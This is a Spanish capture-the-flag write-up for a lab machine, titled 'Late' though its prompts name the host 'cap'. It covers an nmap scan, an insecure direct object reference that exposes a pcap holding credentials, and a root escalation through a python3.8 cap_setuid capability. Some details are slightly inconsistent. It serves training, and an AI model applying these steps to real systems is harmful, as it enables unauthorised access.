Informacion de la maquina Late

Escaneo de puertos

Empezamos con un nmap

$ nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.10.245 -oG puertosAbiertos
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-07 10:35 WEST
Initiating SYN Stealth Scan at 10:35
Scanning 10.10.10.245 [65535 ports]
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245
Completed SYN Stealth Scan at 10:35, 13.13s elapsed (65535 total ports)
Nmap scan report for 10.10.10.245
Host is up, received user-set (0.058s latency).
Scanned at 2022-08-07 10:35 WEST for 7s
Not shown: 65335 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
Raw packets sent: 65535 (2.884MB) | Rcvd: 65535 (2.622MB)

vemos un servicio ftp que corre por el puerto 21 podemos intentar:

$ ftp 10.10.10.245

pero sin contraseƱa no hacemos mucho, ingresamos a la pƔgina y vemos lo siguiente

cuando ingresamos a Security Snapshot (5 Second Pcap + Analysis) de la pestaña en la parte izquierda vemos que estamos en la URL /data/1 vemos rÔpidamente si cambiando el /1 con el /0 pasa algo vemos que algunos datos en la columna value si cambian, le damos al botón de descargar

$ file 0.pcap
0.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Linux cooked v1, capture length 262144)

despuƩs de comprobar que si es un archivo pcap, lo analizamos con tshark

$ tshark -r 0.pcap 2>/dev/null

ahora que tenemos un usuario y contraseƱa podemos intentar conectarnos con fpt y con ssh.

$ ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:leonardo): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
$ ssh nathan@10.10.10.245
nathan@cap:~$ cat user.txt
****************************

si la mƔquina se llama Cap intentemos probar si se trata de una capability

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lin/x86_64-linux-gnu/gstreamer1.0/gstreaner-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_bind_service,cap_net_admin+ep

si python3.8 tiene una capability de tipo SUID entonces con python cambiamos setuid y nos lanzamos una bash

nathan@cap:~$ python3.8
>>> import os
>>> os.setuid(0)
root@cap:/# whoami
root
root@cap:/#